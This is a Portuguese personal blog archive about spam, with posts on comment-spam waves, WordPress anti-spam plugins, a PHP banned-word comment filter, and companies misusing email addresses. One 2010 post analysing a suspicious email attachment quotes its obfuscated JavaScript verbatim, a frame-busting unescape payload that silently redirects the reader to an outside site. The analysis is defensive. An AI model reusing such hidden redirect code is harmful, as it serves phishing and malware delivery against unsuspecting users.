Jefferson, 16 de setembro de 2017, spam Há algumas semanas este blog vem sendo bombardeado por pelo menos 30 mensagens diárias deste tipo:
Nome: mtfntyzcr
URL: gm0xq24iolpfxtp719349n9d06g501c5s.org
email: lidzshp@outlook.com
Mensagem:
|
Quick Talk [url=http://www.gm0xq24iolpfxtp719349n9d06g501c5s.org/]umtfntyzcr[/url] <a href="http://www.gm0xq24iolpfxtp719349n9d06g501c5s.org/">amtfntyzcr</a> mtfntyzcr http://www.gm0xq24iolpfxtp719349n9d06g501c5s.org/ |
A estrutura da mensagem é sempre a mesma. Primeira linha com o nome do meu blog e as outras três linhas são três formas diferentes de indicar o mesmo link. O “bizarro” é que em todos os SPAMs os domínios são diferentes e aparentemente nenhum deles existe. Nome e email seguem sempre o mesmo padrão aleatório. Mas o endereço é sempre de outlook.com.
O Akismet sempre direcionou tudo para a caixa de SPAM, mas como isso estava entulhando a caixa com mais de 300 comentários semanais decidi reativar o plugin de bloqueio Stop Spammers para barrar isso antes mesmo de entrar no meu sistema. Mas até o Stop Spammers se mostrou incapaz de detectar automaticamente, possivelmente porque eu desativei o bloqueio por IP para não barrar ninguém só por usar o IP que foi usado por um spammer. Então eu dei uma olhada nos IPs e descobri que são muitos, diferentes, mas que a maior parte é da China, com alguns da Coréia, Taiwan e Jakarta. Configurei o Stop Spammers para bloquear comentários vindos da China e agora só estão passando mesmo esses poucos de outros países.
Mas qual seria o propósito de um SPAM desses se é ilegível e nenhum link é válido?
(Prefira clicar em "Responder" se estiver comentando um comentário)
Jefferson, 10 de agosto de 2017, GoT, spam, WTF Isso foi postado como comentário hoje no meu post intitulado Minhas impressões sobre Game of Thrones S07E04
Obrigado pelas impressões
Ninguém pode negar definitivamente o sucesso do Game of Thrones, estou surpreso toda a produção por trás da série. No começo eu não estava convencido de que ela, mas como a história progrediu, eu realmente se tornou um fã. Esta nova temporada parece muito emocionante aqui: http://br.hbomax.tv/serie/Game-of-Thrones-Temporada-07-/501441 I compartilhar os horarios. Sucesso está assegurado. Eu amo o elenco.
Eu quase achei que fosse um comentário legítimo, mas aí o português capenga, certamente fruto de tradutor automático, me chamou a atenção. Primeiro eu fui checar se br.hbomax.tv era um site seguro e aparentemente é um dos vários sites “legítimos”[1] da HBO. Depois eu fui checar se o número no final do URL era um identificador e me dei conta que isso só é importante em SPAM enviado por email. Aí eu usei uma expressão usada no texto para buscar se isso havia sido postado em outros lugares e, sim, trata-se de um spammer. O mais engraçado é ver algumas pessoas não se darem conta da estranheza do texto e tentarem interagir com o spam. A falta de senso crítico de algumas pessoas (tá bom, da maioria da população) é realmente extraordinária.
Uma das “personas” do SPAM tem até perfil no Facebook com 91 “amigos”. Outra não tem nenhum até agora mas também tem um perfil no Google+. Isso parece ser coisa da agência de propaganda responsável pelo domínio tentando aumentar o número de visitas deste. Não deve ser um bot, porque o “Obrigado pelas impressões” iria requerer um bot com uma inteligência que nunca vi e os outros comentários do spammer confirmam que ele tem alguma compreensão do conteúdo dos posts. Meu palpite é que seja uma pessoa ou grupo manualmente adicionando comentários “personalizados” em blogs.
O que vocês acham?
[1] Quem me acompanha de perto sabe o que penso desse hábito de manter vários domínios “legítimos” diferentes.
(Prefira clicar em "Responder" se estiver comentando um comentário)
Jefferson, 17 de dezembro de 2012, spam, wordpress Apesar do nome, esse plugin também atua sobre comentários e tem um modo de operação bem amplo e radical. Se você, leitor, não estiver conseguindo mais postar comentários, por favor me avise com um comentário no Geringonças e Gambiarras dizendo qual browser, nome de usuário e email que você está usando. O plugin bloqueia também por IP, o que pode ser um problema, já que a maioria usa IP não-fixo para navegar na internet e pode pegar um IP que tenha sido usado anteriormente por um spammer e esteja em uma blacklist. Como sobrou muito pouco spam depois que implementei o script de palavras proibidas, eu desliguei a opção de checar o IP.
O plugin também tem a opção de bloquear pela ausência do campo HTTP REFERER, o que supostamente indicaria que o spammer não está submetendo o form de comentários através do meu site. Porém dando uma olhada na lista de comentários eu constatei que um monte de comentários legítimos, de Luciano, Walter, Marcel, etc., estão vindo também com o REFERER em branco, por isso eu desliguei essa opção também.
Esse plugin bloqueia o spammer de forma que o comentário ou registro sequer seja feito. Nada de colocar na caixa de spam para eu ter que perder meu tempo analisando depois.
Eu achei esse plugin especialmente interesante por causa dessas características:
- Bloqueia também registros falsos. Coisa que o Akismet não faz;
- Coloca um falso formulário inteiro de comentário em cada página. Esse formulário só pode ser visto pelos bots. Se um formulário desses for submetido, o IP é imediatamente considerado hostil e bloqueado (isso independe do bloqueio por IP que eu desliguei, que é baseado em blacklists);
- Oferece uma blacklist de palavras que se usadas no nome ou email provocam o bloqueio imediato. Eu não creio que um leitor vá usar as palavras “viagra”, “captcha” e “penis” nesses campos, mas spammers usam. O Akismet detecta isso mas joga na caixa de spam e não vejo sentido em armazenar isso se é claramente hostil;
Está em teste. Será desligado se criar problemas para os meus leitores.
(Prefira clicar em "Responder" se estiver comentando um comentário)
Jefferson, 08 de dezembro de 2012, spam, wordpress Não, eu não estou falando de mandar para a caixa de spam. Isso o Akismet já faz muito bem. O que eu vou explicar aqui bloqueia o comentário no momento em que está sendo postado, antes mesmo de passar pelo Akismet.
Nos últimos meses tenho sido bombardeado por milhares de comentários de spam mensais que provavelmente vem do mesmo spammer, divulgando uma dúzia de sites de mala direta (que hoje é sinônimo de spam). Vejam neste blog um exemplo de como esse spammer se comporta. A página recebeu 65 comentários e todos seguem o mesmo padrão.
A predominância desse spammer é tão grande que eu acabo de apagar cerca de 1600 spams, filtrando pelos nomes desses sites, e só restaram uns dez que nada tinham a ver com eles. Ou seja: se eu conseguisse barrar a postagem da propaganda dessa dúzia de sites, minha caixa de spam estaria sempre razoavelmente limpa.
Eu fiz uma pesquisa semanas atrás e não consegui achar nenhum plugin que fizesse isso. Todos os plugins que encontrei limitam-se a jogar mensagens para a caixa de spam. E isso o akismet já faz. Mas com milhares de mensagens que são indubitavelmente spam na caixa, você fica praticamente impossibilitado de detectar as mensagens que cairam lá acidentalmente.
Hoje, depois de ficar de saco cheio por ter que filtrar e apagar essas mensagens de novo, quando “não custaria nada” ao wordpress checar uma lista de doze palavras, fiz uma nova busca e encontrei a solução.
Não é tão simples quanto instalar um plugin, mas também não é nada difícil. Aqui está o código adaptado para as minhas necessidades:
//Acrescente isso no final de functions.php (é um arquivo do tema, não do wordpress)
//pode ser imediatamente antes da linha final com um "?>".
function in_comment_post_like($string, $array) {
foreach($array as $ref) { if(strstr($string, $ref)) { return true; } }
return false;
}
function drop_bad_comments() {
if (!empty($_POST['comment'])) {
$post_comment_content = $_POST['comment'];
$lower_case_comment = strtolower($_POST['comment']);
// Lista de palavras banidas.
// Comentários com essas palavras serão automaticamente deletados
// e quem postou, se não for um bot, verá um alerta.
$bad_comment_content = array(
'viagra',
'hydrocodone',
'xanax',
'tramadol',
'lorazepam',
'adderall',
'dexadrine',
'no prescription',
'oxycontin',
'without a prescription',
'sex pics',
'family incest',
'online casinos',
'online dating',
'cialis',
'ecadastro.com.br',
'seomaster.com',
'divulgaemail.com',
'listadeemails.com',
'casaemail.com.br',
'acertemail.com',
'maladiretasegmentada.com.br',
'busquemail.com.br',
'boliche.com.br',
'kitsucesso.com',
'emailsvip.com.br',
'kitdeemail.com',
'amoxicillin'
);
if (in_comment_post_like($lower_case_comment, $bad_comment_content)) {
wp_die( __('Seu comentário contém palavras ou expressões banidas.') );
}
}
}
add_action('init', 'drop_bad_comments');
O que achei especialmente interessante é que se um humano colocar uma dessas palavras em um comentário legítimo (“viagra” é um exemplo), seu comentário não vai se perder no vazio, porque o script vai responder com “Seu comentário contém palavras ou expressões banidas.”, bastando então clicar no botão Voltar do browser para poder editar o comentário. O script nem tenta dizer o que o gatilhou, entretanto.
Pode testar à vontade. Tente postar um comentário com uma dessas palavras e veja o que acontece.
Nesta outra página você encontrará uma versão mais elaborada, que faz um log no servidor de cada tentativa, com texto, IP, etc.
OBS.: Faça um backup de functions.php antes de fazer qualquer mudança. Uma simples vírgula que você esqueça de colocar pode fazer você perder o acesso ao blog. Aconteceu comigo e fui obrigado a transferir um backup que eu tinha do arquivo por FTP, porque o editor do wordpress não funcionava mais.
Edit: é claro que eu poderia usar um captcha, mas isso acaba enchendo o saco dos leitores legítimos.
(Prefira clicar em "Responder" se estiver comentando um comentário)
Jefferson, 12 de agosto de 2011, spam Sozinho o spammer Panfleto Virtual é responsável por me mandar até cinco SPAMs diários, devidamente filtrados pelo gmail.
http://www.panfletovirtual.com/
Mas o que ainda me surpreende é que a lista de empresas grandes recifenses que financiam a atividade desse spammer não pára de crescer. Dei uma olhada agora na minha caixa de SPAM e a Panfleto Virtual tem mandado propaganda indesejável em nome de:
Walmart Ampla Brasil Faculdade Maurício de Nassau FACIPE FAFIRE
Os administradores dessas contas de publicidade deveriam ter um pouco mais de juízo ou vergonha na cara.
Eu me descadastrei hoje do Panfleto Virtual, clicando no link fornecido por ele. Vamos ver se pelo menos isso o spammer respeita.
(Prefira clicar em "Responder" se estiver comentando um comentário)
Jefferson, 16 de maio de 2011, spam Esta semana eu comecei a receber e-mails promocionais da Revista VEJA na minha conta Hotmail. Mas eu nunca divulguei esse e-mail para além das 15 pessoas da minha lista.
Posso afirmar, sem nenhuma sombra de dúvida, que a Abril obteve meu endereço sem minha permissão.
Liked by: Carlos Augusto
(Prefira clicar em "Responder" se estiver comentando um comentário)
Jefferson, 15 de março de 2011, spam A Submarino parece estar sendo promíscua com seu cadastro.
Acabo de receber um e-mail da Dell, por um endereço que só a Submarino sabia.
Lembrando a todos: como eu tenho um domínio, posso me dar ao luxo de dar um endereço de e-mail diferente para cada pessoa ou empresa.
(Prefira clicar em "Responder" se estiver comentando um comentário)
Jefferson, 05 de outubro de 2010, bloqueados, buzz, spam
Nas últimas 24h já bloqueei dois "seguidores" que evidentemente só queriam que eu os seguisse em retribuição. Não quero ninguém aqui que não esteja realmente interessado no que eu escrevo, só para engordar meus números.
Aliás, eu acho isso no mínimo anti-ético. Declarar afinidade com uma pessoa com o único intuito que ela declare afinidade por você em troca.
(Prefira clicar em "Responder" se estiver comentando um comentário)
Jefferson, 25 de setembro de 2010, spam http://www.panfletovirtual.com é um spammer.
Até aí, nenhuma novidade. Spammers existem às centenas. O diferencial deste é que conseguiu iludir empresas grandes e famosas no Recife como a Ferreira Costa
http://www.ferreiracosta.com/
e a FAFIRE.
http://www.fafire.br/
Como eu posso afirmar que se trata de SPAM? Muuuuito simples. O endereço de e-mail que eles estão usando é um que eu jamais forneço a empresas, mas que aparecia, de forma cifrada (só humanos entendiam), no meu site pessoal, associado à minha cidade. E todo SPAM que recebo deles (39 mensagens no último mês) é para pessoas de Recife. Logo eu sei exatamente onde eles pegaram o e-mail. E lá ainda existia um aviso desautorizando qualquer contato que não fosse pessoal.
É gente sem nenhuma ética. E como quem contrata spammer é spammer, Ferreira Costa e Fafire entram para a minha lista das empresas sem ética no Recife.
(Prefira clicar em "Responder" se estiver comentando um comentário)
Jefferson, 24 de setembro de 2010, malware, spam Hoje eu recebi duas mensagens muito estranhas, que passaram pelo filtro do Gmail, com um anexo em HTML. Visualizando o anexo no Google Docs parecia perfeitamente “seguro”, mas eu sabia que se tratava de alguma pilantragem. Salvei o anexo no HDD e dei uma olhada no código fonte.
Entre uma frase e outra visível, isso estava escondido:
<script>if(frames){if(top.frames.length>0)top.location.href=self.location;}</script><script language=JavaScript>document.write(unescape(‘%3Cme%74a h%74tp%2Deq%75iv%3D%22r%65fr%65sh%22 co%6Ete%6Et%3D%220%3B%75rl%3Dht%74p%3A%2F%2Fg%72ad%75at%69on%6Fut%66it%74er%73%2Ec%6F%2Ez%61%2F1%2Eht%6Dl%22 %2F%3E%0D%0A%3Ct%61bl%65 wi%64th%3D%221%300%25%22 bo%72de%72%3D%22%30%22%3E%3Ctr %62gc%6Flo%72%3D%22%2355%3668%38%22 a%6Cig%6E%3D%22%63en%74er%22%3E%3C%74d%3E%3Ca h%72ef%3D%22h%74tp%3A%2F%2F%77ww%2Epu%6Cls%6Fft%2Eco%6D%2Fh%74ml%70ow%65r%2E%68tm%22%3E%3C%66on%74 fa%63e%3D%22Ar%69al%2C He%6Cve%74ic%61%2C s%61ns%2Dse%72if%22 co%6Cor%3D%22#%46FF%46FF%22 si%7Ae%3D%22%2D1%22%3ET%68is %57eb %50ag%65 wa%73 pr%6Fte%63te%64 by %48TM%4CPo%77er%2C Cl%69ck %68er%65 to %52eg%69st%65r%3C%2Ffo%6Et%3E%3C%2Fa%3E%3C%2F%74d%3E%3C%2Ft%72%3E%3C%2Fta%62le%3E%0D%0A’))</script>
Eu não tive paciência para decodificar tudo, mas se você tiver alguma noção de caracteres de escape e olhar com cuidado após “unescape” verá que isso começa injetando no browser “<meta http equiv refresh…”
Ou seja, é pilantragem mesmo. Não sei ainda o objetivo, mas até clicar em arquivos html está perigoso.
Liked by: Henzo M. F. Gomes, Roberto Acioli
(Prefira clicar em "Responder" se estiver comentando um comentário)
|
|
Eu usava o plugin Bad Behavior antigamente, ja bloqueava os bots antes de irem escrever os spam.
https://br.wordpress.org/plugins/bad-behavior/
É a mesma coisa do Stop Spammers? Não tem nada que bloqueie direto o acesso ao invés de ficar entupindo de besteira?
Nunca usei o Bad Behavior. Mas parece seguir o mesmo princípio.
O objetivo do Stop Spammers é esse. Descartar a mensagem sem nem ir pro SPAM.
O objetivo é exatamente esse: detectar um blog vulnerável. Se não for, nada vai aparecer, mas se for, possivelmente tenha uma outra ação.
Eu não creio que seja isso. O spammer vem todos os dias e tenta postar comentários cinco vezes ou mais na mesma página. Ele está fazendo isso em apenas um punhado das minhas 1754 páginas. Ele não está procurando uma vulnerabilidade no blog. É mais fácil estar procurando uma na minha paciência.
Com o meu bloqueio o spammer parece ter aumentado as tentativas. 10 comentários diários (dá 300 mensais) ainda estão passando pelo bloqueio e caindo na caixa de SPAM pois nem todos os IPs da China são bloqueados pelo Stop Spammers.
Decidi reativar o bloqueio por IP do plugin, que usa a lista do Akismet, para ver o que acontece.
Isso parece ter resolvido o problema. Faz tempo que não vejo SPAM no wordpress